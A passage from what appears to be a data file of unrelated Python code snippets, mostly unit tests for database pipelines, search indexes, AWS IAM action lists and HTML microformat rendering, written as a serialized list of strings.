test_sql_server_cdc_with_specific_capture_instance_name(sdc_builder, sdc_executor, database):\n\n try:\n schema_name = DEFAULT_SCHEMA_NAME\n tables = []\n no_of_records = 5\n no_of_tables = 3\n target_table_index = 2\n rows_in_database = setup_sample_data(no_of_tables * no_of_records)\n\n # setup the tables first\n for index in range(0, no_of_tables):\n table_name = get_random_string(string.ascii_lowercase, 20)\n # split the rows_in_database into no_of_records for each table\n # e.g. 
for no_of_records=5, the first table inserts rows_in_database[0:5]\n # and the secord table inserts rows_in_database[5:10]\n table = setup_table(database, schema_name, table_name,\n rows_in_database[(index*no_of_records): ((index+1)*no_of_records)])\n tables.append(table)\n\n if (index == target_table_index):\n capture_instance_name = f'{schema_name}_{table_name}'\n\n target_rows = rows_in_database[target_table_index * no_of_records: (target_table_index + 1) * no_of_records]\n\n pipeline_builder = sdc_builder.get_pipeline_builder()\n sql_server_cdc = pipeline_builder.add_stage('SQL Server CDC Client')\n sql_server_cdc.set_attributes(table_configuration=[{'capture_instance': capture_instance_name}])\n\n dest_table_name = get_random_string(string.ascii_uppercase, 9)\n\n dest_table = create_table(database, DEFAULT_SCHEMA_NAME, dest_table_name)\n tables.append(dest_table)\n jdbc_producer = pipeline_builder.add_stage('JDBC Producer')\n\n jdbc_producer.set_attributes(schema_name=DEFAULT_SCHEMA_NAME,\n table_name_template=dest_table_name,\n default_operation='INSERT',\n field_to_column_mapping=[])\n\n pipeline_finisher_executor = pipeline_builder.add_stage('Pipeline Finisher Executor')\n\n sql_server_cdc >= pipeline_finisher_executor\n sql_server_cdc >> jdbc_producer\n pipeline = pipeline_builder.build().configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n\n # wait for data captured by cdc jobs in sql server before starting the pipeline\n ct_table_name = f'{capture_instance_name}_CT'\n wait_for_data_in_ct_table(ct_table_name, no_of_records, database)\n\n sdc_executor.start_pipeline(pipeline).wait_for_finished()\n\n assert_table_replicated(database, target_rows, DEFAULT_SCHEMA_NAME, dest_table_name)\n\n finally:\n for table in tables:\n logger.info('Dropping table %s in %s database...', table, database.type)\n table.drop(database.engine)", "def test_create_self_subject_rules_review_for_all_namespaces(self):\n pass", "def test_create_subject_rules_review_for_all_namespaces(self):\n pass", "def test_figure2(self):\n\n encoder = TctColBertQueryEncoder('castorini/tct_colbert-msmarco')\n searcher = SimpleDenseSearcher.from_prebuilt_index('msmarco-passage-tct_colbert-hnsw', encoder)\n hits = searcher.search('what is a lobster roll')\n\n self.assertAlmostEqual(hits[0].score, 70.53741, delta=0.0001)\n self.assertEqual(hits[0].docid, '7157710')\n\n self.assertAlmostEqual(hits[9].score, 69.01737, delta=0.0001)\n self.assertEqual(hits[9].docid, '2920399')\n\n self.assertEqual(len(hits), 10)", "def preprocess(args, dataset, process_splits=('train', 'dev', 'test'), print_aggregated_stats=False, verbose=False):\n text_tokenize, program_tokenize, post_process, table_utils = tok.get_tokenizers(args)\n parsed_programs = load_parsed_sqls(args, augment_with_wikisql=args.augment_with_wikisql)\n num_parsed_programs = len(parsed_programs)\n\n vocabs = load_vocabs(args)\n\n schema_graphs = dataset['schema']\n schema_graphs.lexicalize_graphs(\n tokenize=text_tokenize, normalized=(args.model_id in [VASE, SQLOVA, RATSQL]))\n\n # 32 dbs, 119 table pairs contain ambiguities\n # num_ambs = 0\n # amb_dbs = set()\n # for db_name in schema_graphs.db_index:\n # schema_graph = schema_graphs[db_name]\n # for key in schema_graph.foreign_key_index:\n # if len(schema_graph.foreign_key_index[key]) > 1:\n # print(schema_graph.get_table(key[0]).name, schema_graph.get_table(key[1]).name)\n # for i, (f1, f2) in enumerate(schema_graph.foreign_key_index[key]):\n # print('Key pair {}: {}, {}'.format(i, 
schema_graph.get_field(f1).name,\n # schema_graph.get_field(f2).name))\n # amb_dbs.add(schema_graph.base_name)\n # num_ambs += 1\n # print('{} foreign key ambiguities'.format(num_ambs))\n # print('Foreign key ambiguity detected in {} databases'.format(len(amb_dbs)))\n # import pdb\n # pdb.set_trace()\n\n ############################\n # data statistics\n num_oov = 0\n num_examples = 0\n num_denormalization_failed = 0\n num_schema_truncated = 0\n num_picklist_matched = []\n max_ptr_span_size = 0\n num_text_tokens, num_input_tokens, num_cm_tokens, num_cm_wf_tokens = [], [], [], []\n ############################\n\n # parallel data\n for split in process_splits:\n if not split in dataset:\n print(f\"{split} split not in dataset...\")\n continue\n stats = preprocess_split(dataset, split, args, parsed_programs,\n text_tokenize, program_tokenize, post_process, table_utils,\n schema_graphs, vocabs, verbose=verbose)\n ############################\n # update data statistics\n num_oov_split = stats[0]\n num_denormalization_failed_split = stats[1]\n num_schema_truncated_split = stats[2]\n num_picklist_matched_split = stats[3]\n max_ptr_span_size_split = stats[4]\n num_text_tokens_split, num_input_tokens_split, num_cm_tokens_split, num_cm_wf_tokens_split = stats[5:]\n num_oov += num_oov_split\n num_examples += len(dataset[split])\n num_denormalization_failed += num_denormalization_failed_split\n num_schema_truncated += num_schema_truncated_split\n num_picklist_matched += num_picklist_matched_split\n if max_ptr_span_size_split > max_ptr_span_size:\n max_ptr_span_size = max_ptr_span_size_split\n num_text_tokens += num_text_tokens_split\n num_input_tokens += num_input_tokens_split\n num_cm_tokens += num_cm_tokens_split\n num_cm_wf_tokens += num_cm_wf_tokens_split\n ############################\n\n # if len(parsed_programs) > num_parsed_programs:\n # save_parsed_sqls(args, parsed_programs)\n\n #FORCE SAVE THE PARSES\n parsed_json = os.path.join(args.data_dir, '{}.parsed.json'.format(args.dataset_name))\n if not os.path.exists(parsed_json):\n print(f\"* save the parsed sqls !!! 
\")\n save_parsed_sqls(args, parsed_programs)\n\n\n if print_aggregated_stats:\n print_data_statistics(num_oov, num_examples, num_denormalization_failed, num_schema_truncated,\n max_ptr_span_size, num_text_tokens, num_input_tokens, num_cm_tokens, num_cm_wf_tokens)\n\n out_pkl = get_processed_data_path(args)\n with open(out_pkl, 'wb') as o_f:\n pickle.dump(dataset, o_f)\n print('Processed data dumped to {}'.format(out_pkl))", "def test_clinical(self):\n self.c.execute(\"\"\"select sampleName from clinical_test order by sampleName\"\"\")\n rows = self.c.fetchall()\n self.assertEqual(len(rows), 5) # five samples\n self.assertEqual(rows[0][0], 'sample1') # sample name is sample1\n self.assertEqual(rows[1][0], 'sample4')\n self.assertEqual(rows[2][0], 'sample17')\n self.assertEqual(rows[3][0], 'sample63')\n self.assertEqual(rows[4][0], 'sample101')", "def test_spotdb_reader(spotdb_data):\n\n db = spotdb_data\n\n reader = SpotDBReader(db)\n gfs = reader.read()\n\n assert len(gfs) == 4\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n assert metrics < set(gfs[3].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def assert_es_equals_db():\n # Wait for ES to be available\n current_search.flush_and_refresh('relationships')\n\n # Fetch all DB objects and all ES objects\n es_q = list(RecordsSearch(index='relationships').query().scan())\n db_q = GroupRelationship.query.all()\n\n # normalize and compare two sets\n es_norm_q = list(map(normalize_es_result, es_q))\n db_norm_q = list(map(normalize_db_result, db_q))\n assert set(es_norm_q) == set(db_norm_q)", "def test_find_2018_cais_name_table32():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 32\n\n found_in_table_32, expected_in_table_32 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_32 == expected_in_table_32", "def test_other_iam_data_fixes_in_GH_393(self):\n # Cassandra: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonkeyspacesforapachecassandra.html\n results = get_actions_for_service(\"cassandra\")\n self.assertTrue(\"cassandra:Restore\" in results)\n # Comprehend Medical: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncomprehendmedical.html\n results = get_actions_for_service(\"comprehendmedical\")\n # print(results)\n actions = [\n \"comprehendmedical:DescribeEntitiesDetectionV2Job\",\n \"comprehendmedical:DescribeICD10CMInferenceJob\",\n \"comprehendmedical:DescribePHIDetectionJob\",\n \"comprehendmedical:DescribeRxNormInferenceJob\",\n # \"comprehendmedical:DescribeSNOMEDCTInferenceJob\", # Not in SAR\n \"comprehendmedical:DetectEntitiesV2\",\n \"comprehendmedical:InferICD10CM\",\n \"comprehendmedical:InferRxNorm\",\n # \"comprehendmedical:InferSNOMEDCT\", # Not in SAR\n \"comprehendmedical:ListEntitiesDetectionV2Jobs\",\n \"comprehendmedical:ListICD10CMInferenceJobs\",\n \"comprehendmedical:ListPHIDetectionJobs\",\n \"comprehendmedical:ListRxNormInferenceJobs\",\n # \"comprehendmedical:ListSNOMEDCTInferenceJobs\", # Not in SAR\n \"comprehendmedical:StartEntitiesDetectionV2Job\",\n \"comprehendmedical:StartICD10CMInferenceJob\",\n \"comprehendmedical:StartPHIDetectionJob\",\n \"comprehendmedical:StartRxNormInferenceJob\",\n \"comprehendmedical:StopEntitiesDetectionV2Job\",\n 
\"comprehendmedical:StopICD10CMInferenceJob\",\n ]\n for action in actions:\n # if action not in results:\n # print(action)\n self.assertTrue(action in results)\n # Compute Optimizer\n results = get_actions_for_service(\"compute-optimizer\")\n actions = [\n \"compute-optimizer:DeleteRecommendationPreferences\",\n \"compute-optimizer:ExportEBSVolumeRecommendations\",\n \"compute-optimizer:ExportLambdaFunctionRecommendations\",\n \"compute-optimizer:GetEffectiveRecommendationPreferences\",\n \"compute-optimizer:GetEnrollmentStatusesForOrganization\",\n \"compute-optimizer:GetLambdaFunctionRecommendations\",\n \"compute-optimizer:GetRecommendationPreferences\",\n \"compute-optimizer:PutRecommendationPreferences\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # DataSync\n results = get_actions_for_service(\"datasync\")\n actions = [\n \"datasync:UpdateLocationNfs\",\n \"datasync:UpdateLocationObjectStorage\",\n \"datasync:UpdateLocationSmb\",\n \"datasync:UpdateTaskExecution\"\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # Account Management\n results = get_actions_for_service(\"account\")\n actions = [\n \"account:DeleteAlternateContact\",\n \"account:GetAlternateContact\",\n \"account:PutAlternateContact\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # AWS IAM Access Analyzer\n results = get_actions_for_service(\"access-analyzer\")\n actions = [\n \"access-analyzer:CancelPolicyGeneration\",\n \"access-analyzer:CreateAccessPreview\",\n \"access-analyzer:GetAccessPreview\",\n \"access-analyzer:GetGeneratedPolicy\",\n \"access-analyzer:ListAccessPreviewFindings\",\n \"access-analyzer:ListAccessPreviews\",\n \"access-analyzer:ListPolicyGenerations\",\n \"access-analyzer:StartPolicyGeneration\",\n \"access-analyzer:ValidatePolicy\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # Elemental Activations\n results = get_actions_for_service(\"elemental-activations\")\n actions = [\n \"elemental-activations:CompleteAccountRegistration\",\n \"elemental-activations:StartAccountRegistration\"\n ]\n for action in actions:\n self.assertTrue(action in results)\n # OpenSearch\n results = get_actions_for_service(\"es\")\n actions = [\n \"es:DescribeDomainChangeProgress\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # Location\n results = get_actions_for_service(\"geo\")\n actions = [\n \"geo:CalculateRouteMatrix\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # Amazon Managed Grafana\n results = get_actions_for_service(\"grafana\")\n actions = [\n \"grafana:DescribeWorkspaceAuthentication\",\n \"grafana:UpdateWorkspaceAuthentication\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # EC2 Image Builder\n results = get_actions_for_service(\"imagebuilder\")\n actions = [\n \"imagebuilder:ImportVmImage\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # Timestream\n results = get_actions_for_service(\"timestream\")\n actions = [\n \"timestream:CreateScheduledQuery\",\n \"timestream:DeleteScheduledQuery\",\n \"timestream:DescribeScheduledQuery\",\n \"timestream:ExecuteScheduledQuery\",\n \"timestream:ListScheduledQueries\",\n \"timestream:UpdateScheduledQuery\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # AWS Transfer Family\n results = get_actions_for_service(\"transfer\")\n actions = [\n \"transfer:CreateAccess\",\n \"transfer:CreateWorkflow\",\n \"transfer:DeleteAccess\",\n 
\"transfer:DeleteWorkflow\",\n \"transfer:DescribeAccess\",\n \"transfer:DescribeExecution\",\n \"transfer:DescribeWorkflow\",\n \"transfer:ListAccesses\",\n \"transfer:ListExecutions\",\n \"transfer:ListWorkflows\",\n \"transfer:SendWorkflowStepState\",\n \"transfer:UpdateAccess\",\n ]\n for action in actions:\n self.assertTrue(action in results)", "def test_find_2018_cais_name_table33():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 33\n\n found_in_table_33, expected_in_table_33 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_33 == expected_in_table_33", "def run_check_attribute_types(db,col,elimit,verbose):\n # Although the function allows it this program won't support\n # a query for now because it would get ugly with different \n # definitions for each collection listed. Verbose is \n # also always off. Note the solution to enter one from \n # an input is to use json.loads\n errs=db._check_attribute_types(col,error_limit=elimit)\n mismatch=errs[0]\n undef=errs[1]\n print('check_attribute_types result for collection=',col)\n if verbose: \n if len(mismatch)==0:\n print('Collection has no type inconsistencies with schema')\n else:\n print('//////Collection=',col,' has type inconsistencies in ',\n len(mismatch),' documents////')\n print('///The following have types that do not match schema////')\n print_id_keyed_dict(mismatch)\n if len(undef)==0:\n print('Collection has no data with keys not defined in schema')\n else:\n print('//////Collection=',col,' has unrecogized keys in ',\n len(undef),' documents/////')\n print('////The following are offending data with doc ids///')\n print_id_keyed_dict(undef)\n else:\n if len(mismatch)==0:\n print('Collection has no type inconsistencies with schema')\n else:\n mmkeys=dict()\n for k in mismatch:\n badkeys=mismatch[k]\n for bad in badkeys:\n if bad in mmkeys:\n n=mmkeys[bad]\n n+=1\n mmkeys[bad]=n\n else:\n mmkeys[bad]=1\n print('Collection found ',len(mismatch),\n ' documents with type inconsistencies')\n print('Offending keys and number found follow:')\n print(json_util.dumps(mmkeys,indent=2))\n #Same for undef with minor differences in what is printed\n # maybe should make this a function\n if len(undef)==0:\n print('Collection has no type inconsistencies with schema')\n else:\n mmkeys=dict()\n for k in undef:\n badkeys=undef[k]\n for bad in badkeys:\n if bad in mmkeys:\n n=mmkeys[bad]\n n+=1\n mmkeys[bad]=n\n else:\n mmkeys[bad]=1\n print('Collection found ',len(undef),\n ' documents with keys not defined in the schema')\n print('Offending keys and number found follow:')\n print(json_util.dumps(mmkeys,indent=2))", "def check_consistency(self, es):", "def test_success(database):\n\n det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FORGN\",\n place_of_perform_country_c=\"UKR\", record_type=1)\n det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FoRGN\",\n place_of_perform_country_c=\"uKr\", record_type=1)\n det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"ny**987\",\n place_of_perform_country_c=\"USA\", record_type=2)\n det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"NY**987\",\n place_of_perform_country_c=\"UsA\", record_type=2)\n det_award_5 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"NY**987\",\n place_of_perform_country_c=\"UKR\", record_type=3)\n errors = 
number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])\n assert errors == 0", "def database_setup():\n client = MongoClient('localhost', 27017)\n db = client[\"test_project\"]\n col1 = db['summary']\n keys = open('stems.txt', 'r').read().split('\\n')\n col1.insert({\"_id\": \"_hashmap\",\n \"Total_urls\": 1,\n \"mapping\": {'http://www;pec;ac;in': 0}})\n # setting up summary2 in db\n col2 = db['summary2']\n col2.insert({\"_id\": \"_hashmap\",\n \"Total_urls\": 1,\n \"mapping\": {'http://www;pec;ac;in': 0}})\n for word in keys:\n db.on_page_summary.insert(\n {\"_id\": word + \"_title\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_meta\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_header\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_table\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_html\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_cur_a\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_a\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_page\", \"posting\": []})\n col1.insert({\"_id\": word, \"df\": 0, \"postings\": []})\n col2.insert({\"_id\": word, \"df\": 0, \"postings\": []})\n client.close()", "def test_find_2018_cais_name_table36():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 36\n\n found_in_table_36, expected_in_table_36 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_36 == expected_in_table_36", "def test_find_2018_cais_name_table34():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 34\n\n found_in_table_34, expected_in_table_34 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_34 == expected_in_table_34", "def test_find_2018_cais_name_table12():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 12\n\n found_in_table_12, expected_in_table_12 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_12 == expected_in_table_12", "def test_find_2018_cais_name_table37():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 37\n\n found_in_table_37, expected_in_table_37 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_37 == expected_in_table_37", "def test_figure3(self):\n\n ssearcher = SimpleSearcher.from_prebuilt_index('msmarco-passage')\n encoder = TctColBertQueryEncoder('castorini/tct_colbert-msmarco')\n dsearcher = SimpleDenseSearcher.from_prebuilt_index('msmarco-passage-tct_colbert-hnsw', encoder)\n hsearcher = HybridSearcher(dsearcher, ssearcher)\n\n hits = hsearcher.search('what is a lobster roll')\n\n self.assertAlmostEqual(hits[0].score, 71.56023, delta=0.0001)\n self.assertEqual(hits[0].docid, '7157715')\n\n self.assertAlmostEqual(hits[9].score, 70.07635, delta=0.0001)\n self.assertEqual(hits[9].docid, '7157708')\n\n self.assertEqual(len(hits), 10)", "def test_2():\n results = base_tests()\n correct = {\n \"Consequence\": \"synonymous_variant\",\n \"Codons\": \"tgC/tgT\",\n \"Amino_acids\": \"C\",\n \"Gene\": \"ENSG00000130164\",\n \"SYMBOL\": \"LDLR\",\n \"Feature\": \"ENST00000558013\",\n \"EXON\": \"2/18\",\n 
\"PolyPhen\": \"\",\n \"SIFT\": \"\",\n \"Protein_position\": \"27/858\",\n 'BIOTYPE\"': \"protein_coding\",\n }\n assert results[0] == correct", "def test_success(database):\n\n det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FORGN\",\n place_of_perform_country_c=\"UKR\")\n det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FoRGN\",\n place_of_perform_country_c=\"uKr\")\n det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"ny**987\",\n place_of_perform_country_c=\"USA\")\n det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"NY**987\",\n place_of_perform_country_c=\"UsA\")\n errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4])\n assert errors == 0", "def test_text_classifier_vaporise(self):\n pass", "def test_readSongData():\n\n # make sure the number of columns pull out from the database is correct\n assert svd.song_df.shape[1] == 8", "def check_data():\n check_docs(\"Training\")\n check_docs(\"dev\")\n check_docs(\"Test\")", "def test_ccds(self):\n #TODO write ccds tests", "def test_find_2018_cais_name_table27():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 27\n\n found_in_table_27, expected_in_table_27 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_27 == expected_in_table_27", "def test_index_has_status_in_title(self):", "def test_check_cds_10(self):\n self.cds1.translation_table = 1\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\", \"warning\")\n self.assertEqual(count, 1)", "def test_hreview(self):\n rev1 = microformats.models.hReview()\n rev1.summary=\"Acme's new services rock!\"\n rev1.type='business'\n rev1.description='Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.'\n rev1.rating=4\n rev1.dtreviewed=datetime.datetime(2009,4,10)\n rev1.reviewer='John Smith'\n rev1.fn='Acme Corp'\n rev1.url='http://acme.com'\n rev1.tel='+44(0)1234 567456'\n rev1.street_address = '5445 N. 27th Street'\n rev1.extended_address = ''\n rev1.locality = 'Milwaukee'\n rev1.region = 'WI'\n rev1.country_name = 'US'\n rev1.postal_code = '53209'\n rev1.save()\n rev2 = microformats.models.hReview()\n rev2.summary = 'A phenomenal tuba recital'\n rev2.description = 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.'\n rev2.rating=5\n rev2.type='event'\n rev2.reviewer='John Doe'\n rev2.fn='John Fletcher - One man and his Tuba'\n rev2.url='http://www.johnfletcher-tuba.co.uk/'\n rev2.dtstart = datetime.datetime(1987, 10, 3, 19, 30)\n rev2.street_address = 'The Pro Arte Theatre'\n rev2.locality = 'London'\n rev2.save()\n rev3 = microformats.models.hReview()\n rev3.summary = 'Latest Star-Wars is Sucko-Barfo'\n rev3.description = 'Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. 
Mirum est notare quam littera gothica, quam nunc putamus parum claram, anteposuerit litterarum formas humanitatis per seacula quarta decima et quinta decima. Eodem modo typi, qui nunc nobis videntur parum clari, fiant sollemnes in futurum.'\n rev3.rating=1\n rev3.type='film'\n rev3.reviewer='Barry Norman'\n rev3.fn='Star Wars - Revenge of the Sith'\n rev3.url='http://www.starwars.com/movies/episode-iii/'\n rev3.save()\n # Test for a review concerning something represented by an hCard\n result = hreview(rev1, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n <strong class=\"summary\">Acme&#39;s new services rock!</strong>\\n <abbr class=\"type\" title=\"business\"> Business</abbr> Review\\n <br/>\\n \\n <abbr title=\"\" class=\"dtreviewed\">Fri 10 Apr 2009</abbr>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">John Smith</span></span>\\n \\n \\n <div class=\"item vcard\">\\n \\n <a class=\"url fn org\" href=\"http://acme.com\">\\n \\n Acme Corp\\n \\n </a>\\n \\n <div class=\"tel\">+44(0)1234 567456</div>\\n \\n \\n<div class=\"adr\">\\n <div class=\"street-address\">5445 N. 27th Street</div>\\n \\n <span class=\"locality\">Milwaukee</span>&nbsp;\\n <span class=\"region\">WI</span>&nbsp;\\n <span class=\"postal-code\">53209</span>&nbsp;\\n <span class=\"country-name\">United States</span>\\n</div>\\n\\n \\n </div>\\n \\n \\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"4\">\\u2605\\u2605\\u2605\\u2605\\u2606</abbr>\\n \\n \\n \\n <blockquote class=\"description\">\\n Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.\\n </blockquote>\\n \\n</div>\\n'\n self.assertEquals(expected, result)\n # Test for a review concerning something represented by an hCalendar\n result = hreview(rev2, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n <strong class=\"summary\">A phenomenal tuba recital</strong>\\n <abbr class=\"type\" title=\"event\"> Event</abbr> Review\\n <br/>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">John Doe</span></span>\\n \\n <div class =\"item vevent\">\\n <a href=\"http://www.johnfletcher-tuba.co.uk/\" class=\"url\">\\n \\n <abbr title=\"1987-10-03T19:30:00\" class=\"dtstart\">Sat 03 Oct 1987 7:30 p.m.</abbr>\\n \\n \\n </a> -\\n <span class=\"summary\">John Fletcher - One man and his Tuba</span>\\n \\n \\n<div class=\"adr\">\\n <div class=\"street-address\">The Pro Arte Theatre</div>\\n \\n <span class=\"locality\">London</span>&nbsp;\\n \\n \\n \\n</div>\\n\\n \\n </div>\\n \\n \\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"5\">\\u2605\\u2605\\u2605\\u2605\\u2605</abbr>\\n \\n \\n <blockquote class=\"description\">\\n Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. 
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.\\n </blockquote>\\n \\n</div>\\n'\n self.assertEquals(expected, result)\n # Test for a review about anything else\n result = hreview(rev3, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n <strong class=\"summary\">Latest Star-Wars is Sucko-Barfo</strong>\\n <abbr class=\"type\" title=\"film\"> Film</abbr> Review\\n <br/>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">Barry Norman</span></span>\\n \\n \\n \\n <div class=\"item\">\\n \\n <a class=\"url fn\" href=\"http://www.starwars.com/movies/episode-iii/\">\\n \\n Star Wars - Revenge of the Sith\\n \\n </a>\\n \\n </div>\\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"1\">\\u2605\\u2606\\u2606\\u2606\\u2606</abbr>\\n \\n \\n \\n \\n \\n \\n <blockquote class=\"description\">\\n Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam littera gothica, quam nunc putamus parum claram, anteposuerit litterarum formas humanitatis per seacula quarta decima et quinta decima. Eodem modo typi, qui nunc nobis videntur parum clari, fiant sollemnes in futurum.\\n </blockquote>\\n \\n</div>\\n'\n self.assertEquals(expected, result)\n # Test for minimal review\n rev3.summary = ''\n rev3.description = ''\n rev3.rating = 1\n rev3.type = 'film'\n rev3.reviewer = 'Barry Norman'\n rev3.fn = 'Star Wars - Revenge of the Sith'\n rev3.url = ''\n result = hreview(rev3, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n \\n <abbr class=\"type\" title=\"film\"> Film</abbr> Review\\n <br/>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">Barry Norman</span></span>\\n \\n \\n \\n <div class=\"item\">\\n \\n <span class=\"fn\">\\n \\n Star Wars - Revenge of the Sith\\n \\n </span>\\n \\n </div>\\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"1\">\\u2605\\u2606\\u2606\\u2606\\u2606</abbr>\\n \\n \\n \\n \\n \\n \\n</div>\\n'\n self.assertEquals(expected, result)", "def test_from_spotdb(spotdb_data):\n\n db = spotdb_data\n runs = db.get_all_run_ids()\n gfs = GraphFrame.from_spotdb(spotdb_data, runs[0:2])\n\n assert len(gfs) == 2\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def test_catalogd_ha_with_two_catalogd(self):\n # Verify two catalogd instances are created with one as active.\n catalogds = self.cluster.catalogds()\n assert(len(catalogds) == 2)\n catalogd_service_1 = catalogds[0].service\n catalogd_service_2 = catalogds[1].service\n assert(catalogd_service_1.get_metric_value(\"catalog-server.active-status\"))\n assert(not catalogd_service_2.get_metric_value(\"catalog-server.active-status\"))\n\n # Verify ports of the active catalogd of statestore and impalad are matching with\n # the catalog service port of the current active catalogd.\n self.__verify_statestore_active_catalogd_port(catalogd_service_1)\n self.__verify_impalad_active_catalogd_port(0, catalogd_service_1)\n self.__verify_impalad_active_catalogd_port(1, catalogd_service_1)\n self.__verify_impalad_active_catalogd_port(2, catalogd_service_1)\n # Verify simple queries are ran successfully.\n self.__run_simple_queries()\n # Verify simple queries with sync_ddl as 1.\n self.__run_simple_queries(sync_ddl=True)\n\n # Restart one coordinator. 
Verify it get active catalogd address from statestore.\n self.cluster.impalads[0].restart()\n self.cluster.impalads[0].service.wait_for_metric_value('impala-server.ready',\n expected_value=1, timeout=30)\n self.__verify_impalad_active_catalogd_port(0, catalogd_service_1)", "def classify_result(doc_rslts, _schema):\n return schema.assign_schema(doc_rslts, _schema)", "def main():\n\n for cow in mongo.cows():\n type_ = TYPES['identity']\n label = LABELS['prods']\n parents = []\n settings = {'cow': cow}\n\n if mongo.is_analysis(type_, label, parents, settings):\n print('The document must be unique: {}'.format(cow))\n else:\n mongo.db.analysis.insert_one({\n 'type': type_,\n 'label': label,\n 'parents': parents,\n 'settings': settings,\n 'data': mongo.prods(cow),\n })", "def test_find_2018_cais_name_table31():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 31\n\n found_in_table_31, expected_in_table_31 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_31 == expected_in_table_31", "def 